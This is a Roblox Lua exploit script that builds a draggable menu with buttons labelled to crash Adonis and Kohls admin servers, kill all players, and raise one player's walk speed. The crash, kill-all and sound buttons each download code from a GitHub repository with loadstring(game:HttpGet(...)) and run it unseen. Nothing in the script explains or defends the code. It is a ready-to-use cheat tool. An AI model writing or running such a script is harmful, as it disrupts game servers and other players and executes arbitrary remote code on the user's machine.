
-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local adonisc = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local kohlsc = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local sesacma = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local kapat = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local speedframe = Instance.new("Frame")
local UICorner_6 = Instance.new("UICorner")
local TextLabel_3 = Instance.new("TextLabel")
local speed50 = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local speed100 = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")
local speed150 = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local killall = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
Frame.BackgroundTransparency = 0.100
Frame.Position = UDim2.new(0.148579746, 0, 0.321202546, 0)
Frame.Size = UDim2.new(0, 439, 0, 225)
Frame.Active = true
Frame.Draggable = true

UICorner.Parent = Frame

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.649831414, 0, 0.897777796, 0)
TextLabel.Size = UDim2.new(0, 146, 0, 23)
TextLabel.Font = Enum.Font.Unknown
TextLabel.Text = "Sahibi Salih Reis Siker"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.271903396, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 30)
TextLabel_2.Font = Enum.Font.Unknown
TextLabel_2.Text = "Owner is SalihReis"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

adonisc.Name = "adonisc"
adonisc.Parent = Frame
adonisc.BackgroundColor3 = Color3.fromRGB(85, 85, 255)
adonisc.Position = UDim2.new(0.0145513117, 0, 0.226912856, 0)
adonisc.Size = UDim2.new(0, 200, 0, 38)
adonisc.Font = Enum.Font.Unknown
adonisc.Text = "Crash Server (Adonis)"
adonisc.TextColor3 = Color3.fromRGB(255, 255, 255)
adonisc.TextScaled = true
adonisc.TextSize = 14.000
adonisc.TextWrapped = true
adonisc.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/RlinqKaos/salihreis/main/1"))()
end)

UICorner_2.Parent = adonisc

kohlsc.Name = "kohlsc"
kohlsc.Parent = Frame
kohlsc.BackgroundColor3 = Color3.fromRGB(85, 85, 255)
kohlsc.Position = UDim2.new(0.526108205, 0, 0.226912826, 0)
kohlsc.Size = UDim2.new(0, 200, 0, 38)
kohlsc.Font = Enum.Font.Unknown
kohlsc.Text = "Crash Server (Kohls)"
kohlsc.TextColor3 = Color3.fromRGB(255, 255, 255)
kohlsc.TextScaled = true
kohlsc.TextSize = 14.000
kohlsc.TextWrapped = true
kohlsc.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/RlinqKaos/salihreis/main/3"))()
end)

UICorner_3.Parent = kohlsc

sesacma.Name = "sesacma"
sesacma.Parent = Frame
sesacma.BackgroundColor3 = Color3.fromRGB(255, 170, 0)
sesacma.Position = UDim2.new(0.0145513117, 0, 0.435801744, 0)
sesacma.Size = UDim2.new(0, 200, 0, 38)
sesacma.Font = Enum.Font.Unknown
sesacma.Text = "Ses Açma (Serdar)"
sesacma.TextColor3 = Color3.fromRGB(255, 255, 255)
sesacma.TextScaled = true
sesacma.TextSize = 14.000
sesacma.TextWrapped = true
sesacma.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/RlinqKaos/salihreis/main/4"))()
end)

UICorner_4.Parent = sesacma

kapat.Name = "kapat"
kapat.Parent = Frame
kapat.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
kapat.Position = UDim2.new(0.902050138, 0, 0, 0)
kapat.Size = UDim2.new(0, 43, 0, 37)
kapat.Font = Enum.Font.SourceSansBold
kapat.Text = "X"
kapat.TextColor3 = Color3.fromRGB(0, 0, 0)
kapat.TextScaled = true
kapat.TextSize = 14.000
kapat.TextWrapped = true
kapat.MouseButton1Down:Connect(function()
	Frame.Visible = false
end)

UICorner_5.Parent = kapat

speedframe.Name = "speedframe"
speedframe.Parent = Frame
speedframe.BackgroundColor3 = Color3.fromRGB(85, 170, 255)
speedframe.Position = UDim2.new(0, 0, 0.658023953, 0)
speedframe.Size = UDim2.new(0, 206, 0, 76)

UICorner_6.Parent = speedframe

TextLabel_3.Parent = speedframe
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Size = UDim2.new(0, 206, 0, 18)
TextLabel_3.Font = Enum.Font.Unknown
TextLabel_3.Text = "Speed Ayarları"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

speed50.Name = "speed50"
speed50.Parent = speedframe
speed50.BackgroundColor3 = Color3.fromRGB(204, 0, 255)
speed50.Position = UDim2.new(0.115405753, 0, 0.452667952, 0)
speed50.Size = UDim2.new(0, 48, 0, 32)
speed50.Font = Enum.Font.SourceSansBold
speed50.Text = "+50"
speed50.TextColor3 = Color3.fromRGB(0, 0, 0)
speed50.TextScaled = true
speed50.TextSize = 14.000
speed50.TextWrapped = true
speed50.MouseButton1Down:Connect(function()
	game.Workspace:FindFirstChild("R4turnNext").Humanoid.WalkSpeed = 50
end)

UICorner_7.Parent = speed50

speed100.Name = "speed100"
speed100.Parent = speedframe
speed100.BackgroundColor3 = Color3.fromRGB(170, 0, 255)
speed100.Position = UDim2.new(0.38022837, 0, 0.452667952, 0)
speed100.Size = UDim2.new(0, 48, 0, 32)
speed100.Font = Enum.Font.SourceSansBold
speed100.Text = "+100"
speed100.TextColor3 = Color3.fromRGB(0, 0, 0)
speed100.TextScaled = true
speed100.TextSize = 14.000
speed100.TextWrapped = true
speed100.MouseButton1Down:Connect(function()
	game.Workspace:FindFirstChild("R4turnNext").Humanoid.WalkSpeed = 100
end)

UICorner_8.Parent = speed100

speed150.Name = "speed150"
speed150.Parent = speedframe
speed150.BackgroundColor3 = Color3.fromRGB(203, 0, 3)
speed150.Position = UDim2.new(0.649905384, 0, 0.452667952, 0)
speed150.Size = UDim2.new(0, 48, 0, 32)
speed150.Font = Enum.Font.SourceSansBold
speed150.Text = "+150"
speed150.TextColor3 = Color3.fromRGB(0, 0, 0)
speed150.TextScaled = true
speed150.TextSize = 14.000
speed150.TextWrapped = true
speed150.MouseButton1Down:Connect(function()
	game.Workspace:FindFirstChild("R4turnNext").Humanoid.WalkSpeed = 150
end)

UICorner_9.Parent = speed150

killall.Name = "killall"
killall.Parent = Frame
killall.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
killall.Position = UDim2.new(0.526108205, 0, 0.435801715, 0)
killall.Size = UDim2.new(0, 200, 0, 38)
killall.Font = Enum.Font.Unknown
killall.Text = "Kill All"
killall.TextColor3 = Color3.fromRGB(255, 255, 255)
killall.TextScaled = true
killall.TextSize = 14.000
killall.TextWrapped = true
killall.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/RlinqKaos/salihreis/main/2"))()
end)

UICorner_10.Parent = killall
